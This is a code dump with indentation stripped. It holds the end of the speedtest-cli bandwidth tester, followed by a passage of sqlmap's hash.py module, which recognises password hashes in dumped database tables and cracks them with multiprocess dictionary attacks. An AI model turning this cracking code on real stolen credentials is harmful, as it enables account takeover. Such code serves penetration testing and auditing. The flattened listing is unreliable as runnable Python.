for size in self.config["sizes"]["upload"]:
for _ in range(0, self.config["counts"]["upload"]):
sizes.append(size)
# request_count = len(sizes)
request_count = self.config["upload_max"]
requests = []
for i, size in enumerate(sizes):
# We set ``0`` for ``start`` and handle setting the actual
# ``start`` in ``HTTPUploader`` to get better measurements
data = HTTPUploaderData(
size,
0,
self.config["length"]["upload"],
shutdown_event=self._shutdown_event,
)
if pre_allocate:
data.pre_allocate()
headers = {"Content-length": size}
requests.append(
(
build_request(
self.best["url"], data, secure=self._secure, headers=headers
),
size,
)
)
max_threads = threads or self.config["threads"]["upload"]
in_flight = {"threads": 0}
def producer(q, requests, request_count):
for i, request in enumerate(requests[:request_count]):
thread = HTTPUploader(
i,
request[0],
start,
request[1],
self.config["length"]["upload"],
opener=self._opener,
shutdown_event=self._shutdown_event,
)
while in_flight["threads"] >= max_threads:
timeit.time.sleep(0.001)
thread.start()
q.put(thread, True)
in_flight["threads"] += 1
callback(i, request_count, start=True)
finished = []
def consumer(q, request_count):
_is_alive = thread_is_alive
while len(finished) < request_count:
thread = q.get(True)
while _is_alive(thread):
thread.join(timeout=0.001)
in_flight["threads"] -= 1
finished.append(thread.result)
callback(thread.i, request_count, end=True)
q = Queue(threads or self.config["threads"]["upload"])
prod_thread = threading.Thread(
target=producer, args=(q, requests, request_count)
)
cons_thread = threading.Thread(target=consumer, args=(q, request_count))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
_is_alive = thread_is_alive
while _is_alive(prod_thread):
prod_thread.join(timeout=0.1)
while _is_alive(cons_thread):
cons_thread.join(timeout=0.1)
stop = timeit.default_timer()
self.results.bytes_sent = sum(finished)
self.results.upload = (self.results.bytes_sent / (stop - start)) * 8.0
return self.results.upload
def ctrl_c(shutdown_event):
"""Catch Ctrl-C key sequence and set a SHUTDOWN_EVENT for our threaded
operations
"""
def inner(signum, frame):
shutdown_event.set()
printer("\nCancelling...", error=True)
sys.exit(0)
return inner
def version():
"""Print the version"""
printer("speedtest-cli %s" % __version__)
printer("Python %s" % sys.version.replace("\n", ""))
sys.exit(0)
def csv_header(delimiter=","):
"""Print the CSV Headers"""
printer(SpeedtestResults.csv_header(delimiter=delimiter))
sys.exit(0)
def parse_args():
"""Function to handle building and parsing of command line arguments"""
description = (
"Command line interface for testing internet bandwidth using "
"speedtest.net.\n"
"------------------------------------------------------------"
"--------------\n"
"https://github.com/sivel/speedtest-cli"
)
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument(
"--no-download",
dest="download",
default=True,
action="store_const",
const=False,
help="Do not perform download test",
)
parser.add_argument(
"--no-upload",
dest="upload",
default=True,
action="store_const",
const=False,
help="Do not perform upload test",
)
parser.add_argument(
"--single",
default=False,
action="store_true",
help="Only use a single connection instead of "
"multiple. This simulates a typical file "
"transfer.",
)
parser.add_argument(
"--bytes",
dest="units",
action="store_const",
const=("byte", 8),
default=("bit", 1),
help="Display values in bytes instead of bits. Does "
"not affect the image generated by --share, nor "
"output from --json or --csv",
)
parser.add_argument(
"--share",
action="store_true",
help="Generate and provide a URL to the speedtest.net "
"share results image, not displayed with --csv",
)
parser.add_argument(
"--simple",
action="store_true",
default=False,
help="Suppress verbose output, only show basic " "information",
)
parser.add_argument(
"--csv",
action="store_true",
default=False,
help="Suppress verbose output, only show basic "
"information in CSV format. Speeds listed in "
"bit/s and not affected by --bytes",
)
parser.add_argument(
"--csv-delimiter",
default=",",
type=PARSER_TYPE_STR,
help="Single character delimiter to use in CSV " 'output. Default ","',
)
parser.add_argument(
"--csv-header", action="store_true", default=False, help="Print CSV headers"
)
parser.add_argument(
"--json",
action="store_true",
default=False,
help="Suppress verbose output, only show basic "
"information in JSON format. Speeds listed in "
"bit/s and not affected by --bytes",
)
parser.add_argument(
"--list",
action="store_true",
help="Display a list of speedtest.net servers " "sorted by distance",
)
parser.add_argument(
"--server",
type=PARSER_TYPE_INT,
action="append",
help="Specify a server ID to test against. Can be " "supplied multiple times",
)
parser.add_argument(
"--exclude",
type=PARSER_TYPE_INT,
action="append",
help="Exclude a server from selection. Can be " "supplied multiple times",
)
parser.add_argument("--mini", help="URL of the Speedtest Mini server")
parser.add_argument("--source", help="Source IP address to bind to")
parser.add_argument(
"--timeout",
default=10,
type=PARSER_TYPE_FLOAT,
help="HTTP timeout in seconds. Default 10",
)
parser.add_argument(
"--secure",
action="store_true",
help="Use HTTPS instead of HTTP when communicating "
"with speedtest.net operated servers",
)
parser.add_argument(
"--no-pre-allocate",
dest="pre_allocate",
action="store_const",
default=True,
const=False,
help="Do not pre allocate upload data. Pre allocation "
"is enabled by default to improve upload "
"performance. To support systems with "
"insufficient memory, use this option to avoid a "
"MemoryError",
)
parser.add_argument(
"--version", action="store_true", help="Show the version number and exit"
)
parser.add_argument(
"--debug", action="store_true", help=ARG_SUPPRESS, default=ARG_SUPPRESS
)
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
return args
def validate_optional_args(args):
"""Check if an argument was provided that depends on a module that may
not be part of the Python standard library.
If such an argument is supplied, and the module does not exist, exit
with an error stating which module is missing.
"""
optional_args = {
"json": ("json/simplejson python module", json),
"secure": ("SSL support", HTTPSConnection),
}
for arg, info in optional_args.items():
if getattr(args, arg, False) and info[1] is None:
raise SystemExit(
"%s is not installed. --%s is " "unavailable" % (info[0], arg)
)
def printer(string, quiet=False, debug=False, error=False, **kwargs):
"""Helper function print a string with various features"""
if debug and not DEBUG:
return
if debug:
if sys.stdout.isatty():
out = "\033[1;30mDEBUG: %s\033[0m" % string
else:
out = "DEBUG: %s" % string
else:
out = string
if error:
kwargs["file"] = sys.stderr
if not quiet:
utils.print(out, **kwargs)
def shell():
"""Run the full speedtest.net test"""
global DEBUG
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c(shutdown_event))
args = parse_args()
# Print the version and exit
if args.version:
version()
if not args.download and not args.upload:
raise SpeedtestCLIError("Cannot supply both --no-download and " "--no-upload")
if len(args.csv_delimiter) != 1:
raise SpeedtestCLIError("--csv-delimiter must be a single character")
if args.csv_header:
csv_header(args.csv_delimiter)
validate_optional_args(args)
debug = getattr(args, "debug", False)
if debug == "SUPPRESSHELP":
debug = False
if debug:
DEBUG = True
if args.simple or args.csv or args.json:
quiet = True
else:
quiet = False
if args.csv or args.json:
machine_format = True
else:
machine_format = False
# Don't set a callback if we are running quietly
if quiet or debug:
callback = do_nothing
else:
callback = print_dots(shutdown_event)
printer("Retrieving speedtest.net configuration...", quiet)
try:
speedtest = Speedtest(
source_address=args.source, timeout=args.timeout, secure=args.secure
)
except (ConfigRetrievalError,) + HTTP_ERRORS:
printer("Cannot retrieve speedtest configuration", error=True)
raise SpeedtestCLIError(get_exception())
if args.list:
try:
speedtest.get_servers()
except (ServersRetrievalError,) + HTTP_ERRORS:
printer("Cannot retrieve speedtest server list", error=True)
raise SpeedtestCLIError(get_exception())
for _, servers in sorted(speedtest.servers.items()):
for server in servers:
line = (
"%(id)5s) %(sponsor)s (%(name)s, %(country)s) "
"[%(d)0.2f km]" % server
)
try:
printer(line)
except IOError:
e = get_exception()
if e.errno != errno.EPIPE:
raise
sys.exit(0)
printer("Testing from %(isp)s (%(ip)s)..." % speedtest.config["client"], quiet)
if not args.mini:
printer("Retrieving speedtest.net server list...", quiet)
try:
speedtest.get_servers(servers=args.server, exclude=args.exclude)
except NoMatchedServers:
raise SpeedtestCLIError(
"No matched servers: %s" % ", ".join("%s" % s for s in args.server)
)
except (ServersRetrievalError,) + HTTP_ERRORS:
printer("Cannot retrieve speedtest server list", error=True)
raise SpeedtestCLIError(get_exception())
except InvalidServerIDType:
raise SpeedtestCLIError(
"%s is an invalid server type, must "
"be an int" % ", ".join("%s" % s for s in args.server)
)
if args.server and len(args.server) == 1:
printer("Retrieving information for the selected server...", quiet)
else:
printer("Selecting best server based on ping...", quiet)
speedtest.get_best_server()
elif args.mini:
speedtest.get_best_server(speedtest.set_mini_server(args.mini))
results = speedtest.results
printer(
"Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: "
"%(latency)s ms" % results.server,
quiet,
)
if args.download:
printer("Testing download speed", quiet, end=("", "\n")[bool(debug)])
speedtest.download(callback=callback, threads=(None, 1)[args.single])
printer(
"Download: %0.2f M%s/s"
% ((results.download / 1000.0 / 1000.0) / args.units[1], args.units[0]),
quiet,
)
else:
printer("Skipping download test", quiet)
if args.upload:
printer("Testing upload speed", quiet, end=("", "\n")[bool(debug)])
speedtest.upload(
callback=callback,
pre_allocate=args.pre_allocate,
threads=(None, 1)[args.single],
)
printer(
"Upload: %0.2f M%s/s"
% ((results.upload / 1000.0 / 1000.0) / args.units[1], args.units[0]),
quiet,
)
else:
printer("Skipping upload test", quiet)
printer("Results:\n%r" % results.dict(), debug=True)
if not args.simple and args.share:
results.share()
if args.simple:
printer(
"Ping: %s ms\nDownload: %0.2f M%s/s\nUpload: %0.2f M%s/s"
% (
results.ping,
(results.download / 1000.0 / 1000.0) / args.units[1],
args.units[0],
(results.upload / 1000.0 / 1000.0) / args.units[1],
args.units[0],
)
)
elif args.csv:
printer(results.csv(delimiter=args.csv_delimiter))
elif args.json:
printer(results.json())
if args.share and not machine_format:
printer("Share results: %s" % results.share())
def main():
try:
shell()
except KeyboardInterrupt:
printer("\nCancelling...", error=True)
except (SpeedtestException, SystemExit):
e = get_exception()
# Ignore a successful exit, or argparse exit
if getattr(e, "code", 1) not in (0, 2):
msg = "%s" % e
if not msg:
msg = "%r" % e
raise SystemExit("ERROR: %s" % msg)
if __name__ == "__main__":
main()
|
hash.py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
try:
from crypt import crypt
except ImportError:
from thirdparty.fcrypt.fcrypt import crypt
_multiprocessing = None
try:
import multiprocessing
# problems on FreeBSD (Reference: http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx)
_ = multiprocessing.Queue()
except (ImportError, OSError):
pass
else:
try:
if multiprocessing.cpu_count() > 1:
_multiprocessing = multiprocessing
except NotImplementedError:
pass
import gc
import os
import re
import tempfile
import time
import zipfile
from hashlib import md5
from hashlib import sha1
from hashlib import sha224
from hashlib import sha384
from hashlib import sha512
from Queue import Queue
from lib.core.common import Backend
from lib.core.common import checkFile
from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import getFileItems
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import normalizeUnicode
from lib.core.common import paths
from lib.core.common import readInput
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.convert import hexdecode
from lib.core.convert import hexencode
from lib.core.convert import utf8encode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import HASH
from lib.core.enums import MKSTEMP_PREFIX
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import COMMON_PASSWORD_SUFFIXES
from lib.core.settings import COMMON_USER_COLUMNS
from lib.core.settings import DUMMY_USER_PREFIX
from lib.core.settings import HASH_MOD_ITEM_DISPLAY
from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD
from lib.core.settings import IS_WIN
from lib.core.settings import ITOA64
from lib.core.settings import NULL
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import ROTATING_CHARS
from lib.core.wordlist import Wordlist
from thirdparty.colorama.initialise import init as coloramainit
from thirdparty.pydes.pyDes import des
from thirdparty.pydes.pyDes import CBC
def mysql_passwd(password, uppercase=True):
"""
Reference(s):
http://csl.sublevel3.org/mysql-password-function/
>>> mysql_passwd(password='testpass', uppercase=True)
'*00E247AC5F9AF26AE0194B41E1E769DEE1429A29'
"""
retVal = "*%s" % sha1(sha1(password).digest()).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def mysql_old_passwd(password, uppercase=True): # prior to version '4.1'
"""
Reference(s):
http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c
http://voidnetwork.org/5ynL0rd/darkc0de/python_script/darkMySQLi.html
>>> mysql_old_passwd(password='testpass', uppercase=True)
'7DCDA0D57290B453'
"""
a, b, c = 1345345333, 7, 0x12345671
for d in password:
if d == ' ' or d == '\t':
continue
e = ord(d)
a ^= (((a & 63) + b) * e) + (a << 8)
c += (c << 8) ^ a
b += e
retVal = "%08lx%08lx" % (a & ((1 << 31) - 1), c & ((1 << 31) - 1))
return retVal.upper() if uppercase else retVal.lower()
def postgres_passwd(password, username, uppercase=False):
"""
Reference(s):
http://pentestmonkey.net/blog/cracking-postgres-hashes/
>>> postgres_passwd(password='testpass', username='testuser', uppercase=False)
'md599e5ea7a6f7c3269995cba3927fd0093'
"""
if isinstance(username, unicode):
username = unicode.encode(username, UNICODE_ENCODING)
if isinstance(password, unicode):
password = unicode.encode(password, UNICODE_ENCODING)
retVal = "md5%s" % md5(password + username).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def mssql_passwd(password, salt, uppercase=False):
"""
Reference(s):
http://www.leidecker.info/projects/phrasendrescher/mssql.c
https://www.evilfingers.com/tools/GSAuditor.php
>>> mssql_passwd(password='testpass', salt='4086ceb6', uppercase=False)
'0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a'
"""
binsalt = hexdecode(salt)
unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password))
retVal = "0100%s%s" % (salt, sha1(unistr + binsalt).hexdigest())
return "0x%s" % (retVal.upper() if uppercase else retVal.lower())
def mssql_old_passwd(password, salt, uppercase=True): # prior to version '2005'
"""
Reference(s):
www.exploit-db.com/download_pdf/15537/
http://www.leidecker.info/projects/phrasendrescher/mssql.c
https://www.evilfingers.com/tools/GSAuditor.php
>>> mssql_old_passwd(password='testpass', salt='4086ceb6', uppercase=True)
'0x01004086CEB60C90646A8AB9889FE3ED8E5C150B5460ECE8425AC7BB7255C0C81D79AA5D0E93D4BB077FB9A51DA0'
"""
binsalt = hexdecode(salt)
unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password))
retVal = "0100%s%s%s" % (salt, sha1(unistr + binsalt).hexdigest(), sha1(unistr.upper() + binsalt).hexdigest())
return "0x%s" % (retVal.upper() if uppercase else retVal.lower())
def mssql_new_passwd(password, salt, uppercase=False):
"""
Reference(s):
http://hashcat.net/forum/thread-1474.html
>>> mssql_new_passwd(password='testpass', salt='4086ceb6', uppercase=False)
'0x02004086ceb6eb051cdbc5bdae68ffc66c918d4977e592f6bdfc2b444a7214f71fa31c35902c5b7ae773ed5f4c50676d329120ace32ee6bc81c24f70711eb0fc6400e85ebf25'
"""
binsalt = hexdecode(salt)
unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password))
retVal = "0200%s%s" % (salt, sha512(unistr + binsalt).hexdigest())
return "0x%s" % (retVal.upper() if uppercase else retVal.lower())
def oracle_passwd(password, salt, uppercase=True):
"""
Reference(s):
https://www.evilfingers.com/tools/GSAuditor.php
http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/
http://seclists.org/bugtraq/2007/Sep/304
>>> oracle_passwd(password='SHAlala', salt='1B7B5F82B7235E9E182C', uppercase=True)
'S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C'
"""
binsalt = hexdecode(salt)
retVal = "s:%s%s" % (sha1(utf8encode(password) + binsalt).hexdigest(), salt)
return retVal.upper() if uppercase else retVal.lower()
def oracle_old_passwd(password, username, uppercase=True): # prior to version '11g'
"""
Reference(s):
http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/
>>> oracle_old_passwd(password='tiger', username='scott', uppercase=True)
'F894844C34402B67'
"""
IV, pad = "\0" * 8, "\0"
if isinstance(username, unicode):
username = unicode.encode(username, UNICODE_ENCODING)
if isinstance(password, unicode):
password = unicode.encode(password, UNICODE_ENCODING)
unistr = "".join("\0%s" % c for c in (username + password).upper())
cipher = des(hexdecode("0123456789ABCDEF"), CBC, IV, pad)
encrypted = cipher.encrypt(unistr)
cipher = des(encrypted[-8:], CBC, IV, pad)
encrypted = cipher.encrypt(unistr)
retVal = hexencode(encrypted[-8:])
return retVal.upper() if uppercase else retVal.lower()
def md5_generic_passwd(password, uppercase=False):
"""
>>> md5_generic_passwd(password='testpass', uppercase=False)
'179ad45c6ce2cb97cf1029e212046e81'
"""
retVal = md5(password).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def sha1_generic_passwd(password, uppercase=False):
"""
>>> sha1_generic_passwd(password='testpass', uppercase=False)
'206c80413b9a96c1312cc346b7d2517b84463edd'
"""
retVal = sha1(password).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def sha224_generic_passwd(password, uppercase=False):
"""
>>> sha224_generic_passwd(password='testpass', uppercase=False)
'648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f'
"""
retVal = sha224(password).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def sha384_generic_passwd(password, uppercase=False):
"""
>>> sha384_generic_passwd(password='testpass', uppercase=False)
'6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf'
"""
retVal = sha384(password).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def sha512_generic_passwd(password, uppercase=False):
"""
>>> sha512_generic_passwd(password='testpass', uppercase=False)
'78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44'
"""
retVal = sha512(password).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def crypt_generic_passwd(password, salt, uppercase=False):
"""
Reference(s):
http://docs.python.org/library/crypt.html
http://helpful.knobs-dials.com/index.php/Hashing_notes
http://php.net/manual/en/function.crypt.php
http://carey.geek.nz/code/python-fcrypt/
>>> crypt_generic_passwd(password='rasmuslerdorf', salt='rl', uppercase=False)
'rl.3StKT.4T8M'
"""
retVal = crypt(password, salt)
return retVal.upper() if uppercase else retVal
def wordpress_passwd(password, salt, count, prefix, uppercase=False):
"""
Reference(s):
http://packetstormsecurity.org/files/74448/phpassbrute.py.txt
http://scriptserver.mainframe8.com/wordpress_password_hasher.php
>>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp', uppercase=False)
'$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0'
"""
def _encode64(input_, count):
output = ''
i = 0
while i < count:
value = ord(input_[i])
i += 1
output = output + ITOA64[value & 0x3f]
if i < count:
value = value | (ord(input_[i]) << 8)
output = output + ITOA64[(value >> 6) & 0x3f]
i += 1
if i >= count:
break
if i < count:
value = value | (ord(input_[i]) << 16)
output = output + ITOA64[(value >> 12) & 0x3f]
i += 1
if i >= count:
break
output = output + ITOA64[(value >> 18) & 0x3f]
return output
if isinstance(password, unicode):
password = password.encode(UNICODE_ENCODING)
cipher = md5(salt)
cipher.update(password)
hash_ = cipher.digest()
for i in xrange(count):
_ = md5(hash_)
_.update(password)
hash_ = _.digest()
retVal = prefix + _encode64(hash_, 16)
return retVal.upper() if uppercase else retVal
__functions__ = {
HASH.MYSQL: mysql_passwd,
HASH.MYSQL_OLD: mysql_old_passwd,
HASH.POSTGRES: postgres_passwd,
HASH.MSSQL: mssql_passwd,
HASH.MSSQL_OLD: mssql_old_passwd,
HASH.MSSQL_NEW: mssql_new_passwd,
HASH.ORACLE: oracle_passwd,
HASH.ORACLE_OLD: oracle_old_passwd,
HASH.MD5_GENERIC: md5_generic_passwd,
HASH.SHA1_GENERIC: sha1_generic_passwd,
HASH.SHA224_GENERIC: sha224_generic_passwd,
HASH.SHA384_GENERIC: sha384_generic_passwd,
HASH.SHA512_GENERIC: sha512_generic_passwd,
HASH.CRYPT_GENERIC: crypt_generic_passwd,
HASH.WORDPRESS: wordpress_passwd,
}
def storeHashesToFile(attack_dict):
if not attack_dict:
return
if kb.storeHashesChoice is None:
message = "do you want to store hashes to a temporary file "
message += "for eventual further processing with other tools [y/N] "
kb.storeHashesChoice = readInput(message, default='N', boolean=True)
if not kb.storeHashesChoice:
return
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=".txt")
os.close(handle)
infoMsg = "writing hashes to a temporary file '%s' " % filename
logger.info(infoMsg)
items = set()
with open(filename, "w+") as f:
for user, hashes in attack_dict.items():
for hash_ in hashes:
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
if hash_ and hash_ != NULL and hashRecognition(hash_):
item = None
if user and not user.startswith(DUMMY_USER_PREFIX):
item = "%s:%s\n" % (user.encode(UNICODE_ENCODING), hash_.encode(UNICODE_ENCODING))
else:
item = "%s\n" % hash_.encode(UNICODE_ENCODING)
if item and item not in items:
f.write(item)
items.add(item)
def attackCachedUsersPasswords():
if kb.data.cachedUsersPasswords:
results = dictionaryAttack(kb.data.cachedUsersPasswords)
lut = {}
for (_, hash_, password) in results:
lut[hash_.lower()] = password
for user in kb.data.cachedUsersPasswords.keys():
for i in xrange(len(kb.data.cachedUsersPasswords[user])):
if (kb.data.cachedUsersPasswords[user][i] or "").strip():
value = kb.data.cachedUsersPasswords[user][i].lower().split()[0]
if value in lut:
kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value])
def attackDumpedTable():
if kb.data.dumpedTable:
table = kb.data.dumpedTable
columns = table.keys()
count = table["__infos__"]["count"]
if not count:
return
infoMsg = "analyzing table dump for possible password hashes"
logger.info(infoMsg)
found = False
col_user = ''
col_passwords = set()
attack_dict = {}
for column in columns:
if column and column.lower() in COMMON_USER_COLUMNS:
col_user = column
break
for i in xrange(count):
if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD:
break
for column in columns:
if column == col_user or column == '__infos__':
continue
if len(table[column]['values']) <= i:
continue
value = table[column]['values'][i]
if hashRecognition(value):
found = True
if col_user and i < len(table[col_user]['values']):
if table[col_user]['values'][i] not in attack_dict:
attack_dict[table[col_user]['values'][i]] = []
attack_dict[table[col_user]['values'][i]].append(value)
else:
attack_dict['%s%d' % (DUMMY_USER_PREFIX, i)] = [value]
col_passwords.add(column)
if attack_dict:
infoMsg = "recognized possible password hashes in column%s " % ("s" if len(col_passwords) > 1 else "")
infoMsg += "'%s'" % ", ".join(col for col in col_passwords)
logger.info(infoMsg)
storeHashesToFile(attack_dict)
message = "do you want to crack them via a dictionary-based attack? %s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]")
choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper()
if choice == 'N':
return
elif choice == 'Q':
raise SqlmapUserQuitException
results = dictionaryAttack(attack_dict)
lut = dict()
for (_, hash_, password) in results:
if hash_:
lut[hash_.lower()] = password
infoMsg = "postprocessing table dump"
logger.info(infoMsg)
for i in xrange(count):
for column in columns:
if not (column == col_user or column == '__infos__' or len(table[column]['values']) <= i):
value = table[column]['values'][i]
if value and value.lower() in lut:
table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()]))
table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i]))
def hashRecognition(value):
retVal = None
isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL)
if isinstance(value, basestring):
for name, regex in getPublicTypeMembers(HASH):
# Hashes for Oracle and old MySQL look the same hence these checks
if isOracle and regex == HASH.MYSQL_OLD:
continue
elif isMySQL and regex == HASH.ORACLE_OLD:
continue
elif regex == HASH.CRYPT_GENERIC:
if any((value.lower() == value, value.upper() == value)):
continue
elif re.match(regex, value):
retVal = regex
break
return retVal
def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist, api):
if IS_WIN:
coloramainit()
count = 0
rotator = 0
hashes = set([item[0][1] for item in attack_info])
wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist)
try:
for word in wordlist:
if not attack_info:
break
if not isinstance(word, basestring):
continue
if suffix:
word = word + suffix
try:
current = __functions__[hash_regex](password=word, uppercase=False)
count += 1
if current in hashes:
for item in attack_info[:]:
((user, hash_), _) = item
if hash_ == current:
retVal.put((user, hash_, word))
clearConsoleLine()
infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word)
if user and not user.startswith(DUMMY_USER_PREFIX):
infoMsg += " for user '%s'\n" % user
else:
infoMsg += " for hash '%s'\n" % hash_
dataToStdout(infoMsg, True)
attack_info.remove(item)
elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN:
rotator += 1
if rotator >= len(ROTATING_CHARS):
rotator = 0
status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator])
if not api:
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status))
except KeyboardInterrupt:
raise
except (UnicodeEncodeError, UnicodeDecodeError):
pass # ignore possible encoding problems caused by some words in custom dictionaries
except Exception, e:
warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e)
warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
logger.critical(warnMsg)
except KeyboardInterrupt:
pass
finally:
if hasattr(proc_count, "value"):
with proc_count.get_lock():
proc_count.value -= 1
def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api):
if IS_WIN:
coloramainit()
count = 0
rotator = 0
wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist)
try:
for word in wordlist:
if found.value:
break
current = __functions__[hash_regex](password=word, uppercase=False, **kwargs)
count += 1
if not isinstance(word, basestring):
continue
if suffix:
word = word + suffix
try:
if hash_ == current:
if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes
word = word.upper()
retVal.put((user, hash_, word))
clearConsoleLine()
infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word)
if user and not user.startswith(DUMMY_USER_PREFIX):
infoMsg += " for user '%s'\n" % user
else:
infoMsg += " for hash '%s'\n" % hash_
dataToStdout(infoMsg, True)
found.value = True
elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0:
rotator += 1
if rotator >= len(ROTATING_CHARS):
rotator = 0
status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator])
if user and not user.startswith(DUMMY_USER_PREFIX):
status += ' (user: %s)' % user
if not api:
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status))
except KeyboardInterrupt:
raise
except (UnicodeEncodeError, UnicodeDecodeError):
pass # ignore possible encoding problems caused by some words in custom dictionaries
except Exception, e:
warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e)
warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
logger.critical(warnMsg)
except KeyboardInterrupt:
pass
finally:
if hasattr(proc_count, "value"):
with proc_count.get_lock():
proc_count.value -= 1
def dictionaryAttack(attack_dict):
suffix_list = [""]
custom_wordlist = [""]
hash_regexes = []
results = []
resumes = []
user_hash = []
processException = False
foundHash = False
for (_, hashes) in attack_dict.items():
for hash_ in hashes:
if not hash_:
continue
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
regex = hashRecognition(hash_)
if regex and regex not in hash_regexes:
hash_regexes.append(regex)
infoMsg = "using hash method '%s'" % __functions__[regex].func_name
logger.info(infoMsg)
for hash_regex in hash_regexes:
keys = set()
attack_info = []
for (user, hashes) in attack_dict.items():
for hash_ in hashes:
if not hash_:
continue
foundHash = True
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
if re.match(hash_regex, hash_):
item = None
if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS):
hash_ = hash_.lower()
if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC):
item = [(user, hash_), {}]
elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES):
item = [(user, hash_), {'username': user}]
elif hash_regex in (HASH.ORACLE,):
item = [(user, hash_), {'salt': hash_[-20:]}]
elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW):
item = [(user, hash_), {'salt': hash_[6:14]}]
elif hash_regex in (HASH.CRYPT_GENERIC,):
item = [(user, hash_), {'salt': hash_[0:2]}]
elif hash_regex in (HASH.WORDPRESS,):
if ITOA64.index(hash_[3]) < 32:
item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}]
else:
warnMsg = "invalid hash '%s'" % hash_
logger.warn(warnMsg)
if item and hash_ not in keys:
resumed = hashDBRetrieve(hash_)
if not resumed:
attack_info.append(item)
user_hash.append(item[0])
else:
infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_)
if user and not user.startswith(DUMMY_USER_PREFIX):
infoMsg += " for user '%s'" % user
logger.info(infoMsg)
resumes.append((user, hash_, resumed))
keys.add(hash_)
if not attack_info:
continue
if not kb.wordlists:
